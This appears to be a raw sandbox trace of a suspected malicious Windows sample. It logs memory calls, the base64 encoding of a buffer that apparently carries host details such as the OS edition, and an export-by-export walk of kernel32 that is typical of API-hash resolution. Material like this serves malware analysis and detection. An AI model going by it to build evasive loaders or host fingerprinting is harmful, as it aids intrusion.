0x740000 [0178.477] VirtualFree (lpAddress=0x730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.478] VirtualFree (lpAddress=0x6c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.482] CryptBinaryToStringW (in: pbBinary=0x6c0000, cbBinary=0x782, dwFlags=0x40000001, pszString=0x0, pcchString=0x239e7e0 | out: pszString=0x0, pcchString=0x239e7e0) returned 1 [0178.501] VirtualAlloc (lpAddress=0x0, dwSize=0x140c, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000 [0178.501] CryptBinaryToStringW (in: pbBinary=0x6c0000, cbBinary=0x782, dwFlags=0x40000001, pszString=0x5c0000, pcchString=0x239e7e0 | out: pszString="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", pcchString=0x239e7e0) returned 1 [0178.501] lstrlenA (lpString="kernel32.dll") returned 12 [0178.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.511] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.511] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.511] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.511] lstrlenA (lpString="ADDATOMA") returned 8 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.511] lstrlenA (lpString="ADDATOMW") returned 8 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.511] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.511] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.511] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.511] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.511] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.511] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.511] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.511] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.511] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.511] lstrcpyA (in: lpString1=0x239db58, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.512] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.512] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.512] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.512] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.512] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.512] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.512] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.512] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.512] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.512] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.512] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.512] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.512] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.512] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.512] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.512] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.512] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.512] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.512] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.513] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.513] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.513] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.513] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.513] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.513] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.513] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.513] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.513] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.513] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.513] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.513] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.513] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.513] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.513] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.513] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.513] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.513] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.513] lstrcpyA (in: lpString1=0x239db58, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.513] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.514] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.514] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.514] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.514] lstrlenA (lpString="BEEP") returned 4 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.514] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.514] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.514] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.514] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.514] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.514] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.514] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.514] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.514] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.514] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.514] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.514] lstrlenA (lpString="CANCELIO") returned 8 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.514] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.514] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.514] lstrcpyA (in: lpString1=0x239db58, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.514] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.515] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.515] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.515] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.515] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.515] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.515] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.515] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.515] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.515] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.515] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.515] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.515] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.515] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.515] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.515] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.515] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.515] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.515] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.515] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.516] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.516] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.516] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.516] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.516] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.516] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.516] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.516] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.516] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.516] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.516] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.516] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.516] lstrlenA (lpString="COMPARESTRINGW") returned 14 